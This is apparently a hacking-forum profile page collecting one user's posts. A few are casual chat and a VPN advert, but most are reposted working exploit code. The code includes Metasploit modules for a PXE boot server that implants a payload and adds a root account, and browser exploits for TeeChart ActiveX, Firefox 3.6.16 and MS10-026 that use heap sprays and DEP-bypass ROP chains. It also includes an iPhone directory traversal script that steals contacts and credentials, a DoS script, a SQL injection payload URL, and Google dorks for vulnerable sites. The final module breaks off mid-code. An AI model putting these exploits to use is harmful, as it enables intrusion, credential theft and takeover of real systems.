-
Posts
1576 -
Joined
-
Last visited
-
Days Won
9
Posts posted by Gonzalez
-
-
Contacteaza Support-Team la ambele host-uri.
-Gonzalez
-
-
As vrea ca Snoop sa fie CEO.
-
Wu Tang Clan - Take it back.mp3
-Gonzalez
-
TECHNO & MINIMAL 07.02.2011 (HD)
-
dr_dre-the_wash_feat_snoop_dogg.mp3
-Gonzalez
-
strain sau romanesc?
Research
daca e iptorrents sau demonoid nu vreau. daca e altul pm te rogE TorrentLeech.
Daca ai una in plus, zi-mi prin PM.
Mersi
-Gonzalez
-
Incearca: https://www.cryptocloud.com/
Why do you need us?? Military-grade 2048-bit Encryption: Protect yourself from surveillance, eavesdroppers, websites monitoring your activities and hackers. Safeguard your data and privacy online!
? Bypass government / university / ISP Internet firewalls or proxies and access any website on the Internet (including Facebook, YouTube, Twitter, Flickr, Picasa, Tumblr, DropBox and FourSquare)
? Are you an expat? Cryptocloud gives you back full access to VoIP services (including Skype) in Dubai, China, Oman, Egypt and many other countries!
? Need a global reach? Our servers span multiple countries and jurisdictions, including the US, UK, Netherlands, Switzerland, Russia, Germany and Luxembourg. Change your location and IP address quickly and easily!
? Watch US-only American TV (Hulu, ABC, Comedy Central) and listen to US-only online radio (Last.fm, Pandora, Spotify) even if you don’t live in the US!
? Watch UK TV (BBC) even if you don’t live in the UK!
? Watch French, German and Swiss TV even if you don’t live in those countries!
? On the go? Each subscriber receives two accounts – use CryptoCloud from two different computers at the same time!
? Crossplatform: Compatible with Windows (XP, Vista, 7), Linux and Mac OS X
? Mobile: Compatible with iPhone, iPod, iPad and Android in both 3G and WiFi modes!
? Anonymous P2P: We are the ONLY VPN provider that supports P2P protocols (eMule, KAD, torrents) and port forwarding! Enjoy uncapped speeds, unlimited transfers, and no connection logs kept whatsoever!
? We accept PayPal, Google Checkout, Amazon SimplePay, LibertyReserve, AlertPay as well as all major credit cards (US and International). If you would like to pay by BitCoin, Western Union, mail-in cash, bank transfer or money order, please send an email to support@cryptocloud.com. We'll make sure your account gets activated immediately while we receive your payment!
Cryptocloud employs robust, opensource security technology to protect all of your internet applications from surveillance: web, email, IM, VoIP, p2p - every packet.
Route around censorship and limitations like packet shaping, content filtering, traffic logging, and protocol limits - make your own 'net neutrality'.
-Gonzalez
-
nice share
-
seo, promovare pe twitter, facebook, un grup de yahoo etc.
seo, seo, seo
-
##
# $Id: pxexploit.rb 13493 2011-08-05 17:10:27Z scriptjunkie $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/proto/tftp'
require 'rex/proto/dhcp'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::TFTPServer
def initialize
super(
'Name' => 'PXE exploit server',
'Version' => '$Revision: 13493 $',
'Description' => %q{
This module provides a PXE server, running a DHCP and TFTP server.
The default configuration loads a linux kernel and initrd into memory that
reads the hard drive; placing the payload on the hard drive of any Windows
partition seen, and add a uid 0 user with username and password metasploit to any
linux partition seen.
},
'Author' => [ 'scriptjunkie' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13493 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 4500,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal',
{
}
],
],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Passive,
'DefaultTarget' => 0
)
register_options(
[
OptInt.new('SESSION', [ false, 'A session to pivot the attack through' ])
], self.class)
register_advanced_options(
[
OptString.new('TFTPROOT', [ false, 'The TFTP root directory to serve files from' ]),
OptString.new('SRVHOST', [ false, 'The IP of the DHCP server' ]),
OptString.new('NETMASK', [ false, 'The netmask of the local subnet', '255.255.255.0' ]),
OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]),
OptString.new('DHCPIPEND', [ false, 'The last IP to give out' ])
], self.class)
end
def exploit
if not datastore['TFTPROOT']
datastore['TFTPROOT'] = File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')
end
datastore['FILENAME'] = "update1"
datastore['SERVEONCE'] = true # once they reboot; don't infect again - you'll kill them!
# Prepare payload
print_status("Creating initrd")
initrd = IO.read(File.join(Msf::Config.data_directory, 'exploits', 'pxexploit','updatecustom'))
uncompressed = Rex::Text.ungzip(initrd)
payl = payload.generate
uncompressed[uncompressed.index('AAAAAAAAAAAAAAAAAAAAAA'),payl.length] = payl
initrd = Rex::Text.gzip(uncompressed)
# Meterpreter attack
if framework.sessions.include? datastore['SESSION']
client = framework.sessions[datastore['SESSION']]
if not client.lanattacks
print_status("Loading lanattacks extension...")
client.core.use("lanattacks")
end
print_status("Loading DHCP options...")
client.lanattacks.load_dhcp_options(datastore)
1.upto(4) do |i|
print_status("Loading file #{i} of 4")
if i < 4
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
else
contents = initrd
end
client.lanattacks.add_tftp_file("update#{i}",contents)
end
print_status("Starting TFTP server...")
client.lanattacks.start_tftp
print_status("Starting DHCP server...")
client.lanattacks.start_dhcp
print_status("pxesploit attack started")
return
end
# normal attack
print_status("Starting TFTP server...")
@tftp = Rex::Proto::TFTP::Server.new
@tftp.set_tftproot(datastore['TFTPROOT'])
@tftp.register_file('update4',initrd)
@tftp.start
print_status("Starting DHCP server...")
@dhcp = Rex::Proto::DHCP::Server.new( datastore )
@dhcp.start
print_status("pxesploit attack started")
# Wait for finish..
@tftp.thread.join
@dhcp.thread.join
print_status("pxesploit attack completed")
end
end -
#!/usr/bin/python
#----------------------------------------------------------------
#Software : iPhone/iPad Phone Drive 1.1.1
#Type of vulnerability : Directory Traversal
#Tested On : iPhone 4 (IOS 4.3.3/Jailbroken)
#----------------------------------------------------------------
#Program Developer : http://ax.itunes.apple.com/app/id431033044?mt=8
#----------------------------------------------------------------
#Discovered by : Khashayar Fereidani
#Team Website : Http://IRCRASH.COM
#English Forums : Http://IRCRASH.COM/forums/
#Team Members : Khashayar Fereidani , Arash Allebrahim
#Email : irancrash [ a t ] gmail [ d o t ] com
#Facebook : http://facebook.com/fereidani
#Twitter : http://twitter.com/ircrash
#----------------------------------------------------------------
import urllib2
def urlread(url,file):
url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file
u = urllib2.urlopen(url)
localFile = open('result.html', 'w')
localFile.write(u.read())
localFile.close()
print "file saved as result.html\nIRCRASH.COM 2011"
print "----------------------------------------\n- iPhone/iPad Phone Drive 1.1.1 DT -\n- Discovered by : Khashayar Fereidani -\n- http://ircrash.com/ -\n----------------------------------------"
url = raw_input("Enter Address ( Ex. : http://192.168.1.101:8080 ):")
f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]
print f[1]
id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))
if not('http:' in url):
url='http://'+url
if ((id>0) and (id<6)):
file=f[id]
urlread(url,file)
if (id==6):
file=raw_input("Enter Local File Address : ")
urlread(url,file) -
#!/usr/bin/python
# Exploit Title: Simple HTTPd 1.42 PoC DoS
# Date: 8/10/2011
# Author: G13
# Software Link:
http://sourceforge.net/projects/shttpd/files/shttpd/1.42/shttpd-1.42.tar.gz/download
# Version: 1.42
# Tested on: WinXP SP1
# CVE : 2011-2900
#
# Since Mongoose HTTPd and Simple HTTPd share similar code, the exploit
still works.
# Simple HTTPd is still affected by the bug. The executable must be
compiled with -DNO_AUTH and -D_DEBUG enabled. I compiled
# under MinGW.
import socket, sys
buf = "A" * 6000
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.101',80))
s.send("PUT /" + buf + "/ HTTP/1.0\r\n")
s.send("\r\n")
print s.recv(1024)
s.close() -
DORK:allinurl:borrow.php?diskid=
DORK:allintitle:videodb
# Vendor: http://www.videodb.net/blog/
$ -----------#
| S3C0VERUN |
& ------------@
along with this i was able in some sites to determine that you can overwrite the databse contents and also if you look in the source you se there password the server name and the dbuser htis is a problem because most likely the site could be taken over
due to the fact the admin doesnt usually change passwords on the same box
vulnerable software is videodb
this is an information disclosure vulnerability it appears most sites running this are vulnerable and have the same database structure im not sure if this is an old version or if it is
completely vulnerable im downloading the new version now from source
<?php
/**
* Borrow Manager
*
* Handles lending of disks
*
* @package videoDB
* @author Andreas Gohr <a.gohr@web.de>
* @version $Id: borrow.php,v 2.20 2008/05/12 13:01:12 andig2 Exp $
*/
require_once './core/functions.php';
require_once './core/output.php';
// check for localnet
localnet_or_die();
// permission check
permission_or_die(PERM_WRITE, PERM_ANY);
// borrowmanagement for single disk
$editable = false;
if (!empty($diskid))
{
if (check_permission(PERM_WRITE, get_owner_id($diskid,true)))
{
$editable = true;
if ($return) {
$SQL = "DELETE FROM ".TBL_LENT." WHERE diskid = '".addslashes($diskid)."'";
runSQL($SQL);
}
if (!empty($who)) {
$who = addslashes($who);
$SQL = "INSERT INTO ".TBL_LENT." SET who = '".addslashes($who)."', diskid = '".addslashes($diskid)."'";
runSQL($SQL);
}
$SQL = "SELECT who, DATE_FORMAT(dt,'%d.%m.%Y') AS dt
FROM ".TBL_LENT."
WHERE diskid = '".addslashes($diskid)."'";
$result = runSQL($SQL);
$who = $result[0]['who'];
$dt = $result[0]['dt'];
}
}
$WHERES = '';
if ($config['multiuser'])
{
// get owner from session- or use current user
session_default('owner', get_username(get_current_user_id()));
// build html select box
$all = strtoupper($lang['radio_all']);
$smarty->assign('owners', out_owners(array($all => $all), PERM_READ));
$smarty->assign('owner', $owner);
// if we don't have read all permissions, limit visibility using cross-user permissions
if (!check_permission(PERM_READ))
{
$JOINS = ' LEFT JOIN '.TBL_PERMISSIONS.' ON '.TBL_DATA.'.owner_id = '.TBL_PERMISSIONS.'.to_uid';
$WHERES .= ' AND '.TBL_PERMISSIONS.'.from_uid = '.get_current_user_id().' AND '.TBL_PERMISSIONS.'.permissions & '.PERM_READ.' != 0';
}
// further limit to single owner
if ($owner != $all) $WHERES .= " AND ".TBL_USERS.".name = '".addslashes($owner)."'";
}
// overview on lent disks
$SQL = "SELECT who, DATE_FORMAT(dt,'%d.%m.%Y') as dt, ".TBL_LENT.".diskid,
CASE WHEN subtitle = '' THEN title ELSE CONCAT(title,' - ',subtitle) END AS title,
".TBL_DATA.".id, COUNT(".TBL_LENT.".diskid) AS count, ".TBL_USERS.".name AS owner
FROM ".TBL_LENT.", ".TBL_DATA."
LEFT JOIN ".TBL_USERS." ON owner_id = ".TBL_USERS.".id
$JOINS
WHERE ".TBL_LENT.".diskid = ".TBL_DATA.".diskid
$WHERES
GROUP BY ".TBL_LENT.".diskid
ORDER BY who, ".TBL_LENT.".diskid";
$result = runSQL($SQL);
// check permissions
for($i=0; $i < count($result); $i++)
{
$result[$i]['editable'] = check_permission(PERM_WRITE, get_userid($result[$i]['owner']));
}
// prepare templates
tpl_page();
$smarty->assign('diskid', $diskid);
$smarty->assign('who', $who);
$smarty->assign('dt', $dt);
$smarty->assign('editable', $editable);
$smarty->assign('borrowlist', $result);
// display templates
tpl_display('borrow.tpl');
?>
ADDSLASHES IS THE PROBLEM I ASSUME IT COULD BE MUCH WORSE IF HE MADE THIS MISTAKE I URGE YOU ALL TOO LOOK INTO THE CODE
the problem here is the fact he is using addslashes that can be bypassed with a valid multi byte ending in 0x5c describd in chris Shiflett's article
if i must say this could be either good or bad thing is it just throws an error the injection is possible on all of these
nnow what are we to do this could be huge or small depending on if it is used widely or just small based but this is the new code from sourceforge
i believe this to b the script that caused the issue most of the sites including the makers demo use borrow few others changed -
=========================================
Mambo CMS 4.6.x (4.6.5) | SQL Injection
=========================================
1. OVERVIEW
Mambo CMS 4.6.5 and lower versions are vulnerable to SQL Injection.
2. BACKGROUND
Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo's "power in simplicity" also makes it the CMS of choice for many small businesses and personal sites.
3. VULNERABILITY DESCRIPTION
The "zorder" parameter was not properly sanitized upon submission to the administrator/index2.php url, which allows attacker to conduct SQL Injection attack. This could an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
4. VERSIONS AFFECTED
Tested on Mambo CMS 4.6.5
5. PROOF-OF-CONCEPT/EXPLOIT
http://localhost/mambo/administrator/index2.php?limit=10&order[]=11&boxchecked=0&toggle=on&search=sqli&task=&limitstart=0&cid[]=on&zorder=-1 OR (SELECT 9999 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,112,101,58),(SELECT (CASE WHEN (9999=9999) THEN 1 ELSE 0 END)),CHAR(58,110,100,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&filter_authorid=62&hidemainmenu=0&option=com_typedcontent
6. SOLUTION
The vendor seems to discontinue the development. It is recommended to use another CMS in active development.
7. VENDOR
Mambo CMS Development Team
8. CREDIT
This vulnerability was discovered by Aung Khant, YGN Ethical Hacker Group :: Where Burmese Hackers were Born, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2010-11-31: notified vendor through bug tracker
2011-08-12: no patched version released up to date
2011-08-12: vulnerability disclosed
10. REFERENCES
Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[mambo4.6_x]_sql_injection
Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip
#yehg [2011-08-12]
-
##
# $Id: teechart_pro.rb 13522 2011-08-11 11:17:30Z swtornio $
##
###
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super( update_info(info,
'Name' => 'TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference',
'Description' => %q{
This module exploits a integer overflow in TeeChart Pro ActiveX control. When
sending an overly large/negative integer value to the AddSeries() property of
TeeChart2010.ocx, the code will perform an arithemetic operation that wraps the
value and is later directly trusted and called upon.
This module has been designed to bypass DEP only under IE8. Multiple versions
(including the latest version) are affected by this vulnerability that date back to
as far as 2001.
The following controls are vulnerable:
TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4);
TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD);
TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E);
TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196);
TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258).
The controls are deployed under several SCADA based systems including:
Unitronics OPC server v1.3;
BACnet Operator Workstation Version 1.0.76
},
'License' => MSF_LICENSE,
'Author' =>
[
# twitter.com/net__ninja
'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery/msf module
],
'Version' => '$Revision: 13522 $',
'References' =>
[
#[ 'CVE', '?' ],
[ 'OSVDB', '74446'],
[ 'URL', 'http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
# For exploitation we need to calculate a value for EDX:
# <target address> - EAX / 4 = address to place in edx via signed integar
# 0x0c0c0c0c - 0x023FB8F4 = 0x09CC5318 / 4 = 0x027314C6 = decimal: 41096390
[
'Windows XP SP0-SP3 (IE6/IE7)',
{
'Ret' => 0x027314C6
}
],
# Windows XP target + IE8 + JAVA = ASLR/DEP Bypass
# 0x09442020- 0x0326B8F4 = 61D672C/4 = 18759CB
[
'Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)',
{
'Ret' => 0x014E59CB,
# 0x09442020-0x2c+4 (compensate for CALL [EAX+2C] + 1st gadget) = 0x09441FF8
# get back to the 2nd of rop.
'Pivot' => 0x09441FF8
}
],
# Windows 7 target + IE8 + JAVA = ASLR/DEP Bypass
# 0x16672020 - 0x040AB8F4/4 = 0x049719CB
[
'Windows 7 + JAVA + DEP bypass (IE8)',
{
'Ret' => 0x049719CB,
# 0x16672020-0x2c+4 (compensate for CALL [EAX+2C] + 1st gadget) = 0x16671FF8
# get back to the 2nd of rop.
'Pivot' => 0x16671FF8
}
]
],
'DisclosureDate' => 'Aug 11 2011',
'DefaultTarget' => 0))
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def on_request_uri(cli, request)
#Set target manually or automatically
my_target = target
if my_target.name == 'Automatic'
agent = request.headers['User-Agent']
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
my_target = targets[1]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
my_target = targets[1]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[2]
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[3]
end
end
print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# align stack
retn = Rex::Text.to_unescape([0x7C3410C4].pack('V*'))
pop_pop_retn = Rex::Text.to_unescape([0x7C3410C2].pack('V*'))
# shellcode
sc = Rex::Text.to_unescape(p.encoded)
# Randomize ALL the javascript variable names.
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
rand9 = rand_text_alpha(rand(100) + 1)
rand10 = rand_text_alpha(rand(100) + 1)
j_applet = rand_text_alpha(rand(100) + 1)
if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
js = <<-EOF
var #{rand3} = unescape('#{sc}');
var #{rand4} = unescape('%u0c0c%u0c0c');
var #{rand5} = 20;
var #{rand6} = #{rand5} + #{rand3}.length;
while(#{rand4}.length < #{rand6}) {
#{rand4} += #{rand4};
}
var #{rand7} = #{rand4}.substring(0, #{rand6});
var #{rand8} = #{rand4}.substring(0, #{rand4}.length - #{rand6});
while((#{rand8}.length + #{rand6}) < 0x50000) {
#{rand8} = #{rand8} + #{rand8} + #{rand7};
}
#{rand10}=new Array();
for(#{rand9}=0; #{rand9}<200; #{rand9}++){
#{rand10}[#{rand9}] = #{rand8} + #{rand3};
}
function #{rand2}()
{
#{rand1}.AddSeries(#{target.ret});
}
EOF
end
#http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf
if my_target.name =~ /IE8/
# thanks to corelanc0d3r & mona.py :^) for the universal aslr/dep bypass (msvcr71.dll)
# https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
rop_gadgets = [
my_target['Pivot'],# Pivot back EAX for ESP control
0x7C342643, # XCHG EAX,ESP; POP EDI; ; ADD BYTE PTR DS:[EAX],AL; POP ECX; RETN
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # Make EAX readable
0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
0x41414141, # EBP (filler)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # <- *&VirtualProtect()
0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
0x7c346c0b, # Slide, so next gadget would write to correct stack location
0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
0x41414141, # EDI (filler)
0x41414141, # will be patched at runtime (VP), then picked up into ESI
0x41414141, # EBX (filler)
0x7c376402, # POP EBP # RETN (msvcr71.dll)
0x7c345c30, # ptr to 'push esp # ret ' (from MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0xfffffdff, # size 0x00000201 -> ebx, modify if needed
0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
0x7c354901, # POP EBX # RETN (MSVCR71.dll)
0xffffffff, # pop value into ebx
0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
0x7c34b8d8, # ROP NOP (-> edi)
0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
0xffffffc0, # value to negate, target value : 0x00000040, target: edx
0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x90909090, # NOPS (-> eax)
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
].pack('V*')
rop = Rex::Text.to_unescape(rop_gadgets)
custom_js = <<-EOF
function #{rand3}(){
#{rand5} = new heapLib.ie(0x20000);
var #{rand6} = unescape('#{rop}');
#{rand6} += unescape('#{sc}');
while(#{rand6}.length <= 0xffc) #{rand6} += unescape('#{retn}')
while(#{rand6}.length < 0x1000) #{rand6} += unescape('#{pop_pop_retn}')
var #{rand7} = #{rand6};
while(#{rand7}.length < 0x40000) #{rand7} += #{rand7};
#{rand8} = #{rand7}.substring(2, 0x40000 - 0x21);
for(var i = 0; i < 0x400; i++) {
#{rand5}.alloc(#{rand8});
}
}
function #{rand2}(){
#{rand3}();
#{rand1}.AddSeries(#{my_target.ret});
}
EOF
js = heaplib(custom_js)
end
content = <<-EOF
<object classid='clsid:FCB4B50A-E3F1-4174-BD18-54C3B3287258' id='#{rand1}' ></object>
<script language='JavaScript' defer>
#{js}
</script>
<body onload="JavaScript: return #{rand2}();">
<body>
</html>
EOF
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
#Remove the extra tabs from content
content = content.gsub(/^\t\t/, '')
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end -
##
# $Id: mozilla_mchannel.rb 13507 2011-08-10 05:58:02Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::FF,
:ua_minver => "3.6.16",
:ua_maxver => "3.6.16",
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking,
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
'Description' => %q{
This module exploits an use after free vulnerability in Mozilla
Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
becomes a dangling pointer and can be reused when setting the OBJECTs
data attribute. (Discovered by regenrecht). This module uses heapspray
with a minimal ROP chain to bypass DEP on Windows XP SP3
},
'License' => MSF_LICENSE,
'Author' =>
[
'regenrecht', # discovery
'Rh0' # metasploit module
],
'Version' => "$Revision: 13507 $",
'References' =>
[
['CVE', '2011-0065'],
['OSVDB', '72085'],
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'],
['URL', 'http://www.mozilla.org/security/announce/2010/mfsa2011-13.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
},
'Targets' =>
[
[
'Firefox 3.6.16 on Windows XP SP3',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 10 2011'
))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli).encoded) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
def generate_html(payload)
# DEP bypass using xul.dll
custom_stack = [
0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8
0x7c801ad4, # VirtualProtect
0xbeeff00d,
0xbeeff00d,
0x1003876B, # jmp esp
0x0c0c0048, # start address
0x00000400, # size 1024
0x00000040, # Page EXECUTE_READ_WRITE
0x0c0c0c00 # old protection
].pack("V*")
payload_buf = ''
payload_buf << custom_stack
payload_buf << payload
escaped_payload = Rex::Text.to_unescape(payload_buf)
#Random JavaScript variable names
js_element_name = rand_text_alpha(rand(10) + 5)
js_obj_addr_name = rand_text_alpha(rand(10) + 5)
js_sc_name = rand_text_alpha(rand(10) + 5)
js_ret_addr_name = rand_text_alpha(rand(10) + 5)
js_chunk_name = rand_text_alpha(rand(10) + 5)
js_final_chunk_name = rand_text_alpha(rand(10) + 5)
js_block_name = rand_text_alpha(rand(10) + 5)
#Reference: adobe_flashplayer_newfunction.rb
custom_js = <<-JS
#{js_element_name} = document.getElementById("d");
#{js_element_name}.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0);
#{js_obj_addr_name} = unescape("\\x0c%u0c0c");
var #{js_sc_name} = unescape("#{escaped_payload}");
var #{js_ret_addr_name} = unescape("%u0024%u0c0c");
while(#{js_ret_addr_name}.length+20+8 < 0x100000) {#{js_ret_addr_name} += #{js_ret_addr_name};}
var #{js_chunk_name} = #{js_ret_addr_name}.substring(0,(0x48-0x24)/2);
#{js_chunk_name} += #{js_sc_name};
#{js_chunk_name} += #{js_ret_addr_name};
var #{js_final_chunk_name} = #{js_chunk_name}.substring(0,0x10000/2);
while (#{js_final_chunk_name}.length<0x800000) {#{js_final_chunk_name} += #{js_final_chunk_name};}
var #{js_block_name} = #{js_final_chunk_name}.substring(0,0x80000 - (0x1020-0x08)/2);
array = new Array()
for (n=0;n<0x1f0;n++){
array[n] = #{js_block_name} + #{js_sc_name};
}
#{js_element_name}.data = "";
JS
#Remove the extra tabs
custom_js = custom_js.gsub(/^\t\t/, '')
html = <<-HTML
<html>
<body>
<object id="d"><object>
<script type="text/javascript">
#{custom_js}
</script>
</body>
</html>
HTML
return html
end
end -
##
# $Id: ms10_026_avi_nsamplespersec.rb 13555 2011-08-13 02:15:05Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow',
'Description' => %q{
This module exploits a buffer overlow in l3codecx.ax while processing a
AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite
with 0's so the three least significant bytes of EIP saved on stack are
overwritten and shellcode is mapped using the .NET DLL memory technique pioneered
by Alexander Sotirov and Mark Dowd.
Please note on IE 8 targets, your malicious URL must be a trusted site in order
to load the .Net control.
},
'Author' =>
[
'Yamata Li', # Vulnerability Discovery
'Shahin Ramezany <shahin[at]abysssec.com', # Vulnerability Analysis and Exploit
'juan vazquez', # Metasploit module
'Jordi Sanchez <jsanchez[at]0x01000000.org>', # Metasploit module - Help
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13555 $',
'References' =>
[
['CVE', '2010-0480'],
['OSVDB', '63749'],
['BID', '39303'],
['MSB', 'MS10-026'],
['URL', 'http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/'],
['URL', 'http://www.phreedom.org/research/bypassing-browser-memory-protections/']
],
'Payload' =>
{
'Space' => 4000
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
},
'Targets' =>
[
# Target 0: Automatic
# Tested with:
# Windows XP SP3 English IE 6
# Windows XP SP3 English IE 7
# Windows XP SP3 English IE 8: The exploiting site must be a trusted
# site to load the .NET control
# .NET CLR required
[
'Windows XP SP3 Automatic',
{
'Platform' => 'win',
'Ret' => 0x72000000
},
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 13 2010'))
end
def exploit
# Embed our payload in a .Net binary
ibase = target.ret - 0x10000
shellcode = rand_text_alpha(target.ret - ibase - 0x2285)
shellcode << payload.encoded
#Use our own custom .Net binary, because we require a much bigger file
#to land our payload at the right place
opts = {
:template => 'template_dotnetmem.dll',
:text_offset => 0x1285,
:text_max => 0x20000,
:pack => 'a131072',
:uuid_offset => 135816
}
@dotnet_payload = Msf::Util::EXE.to_dotnetmem(ibase, shellcode, opts)
# Load our AVI file
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-0480.avi")
f = File.open(path, "rb")
@trigger = f.read(f.stat.size)
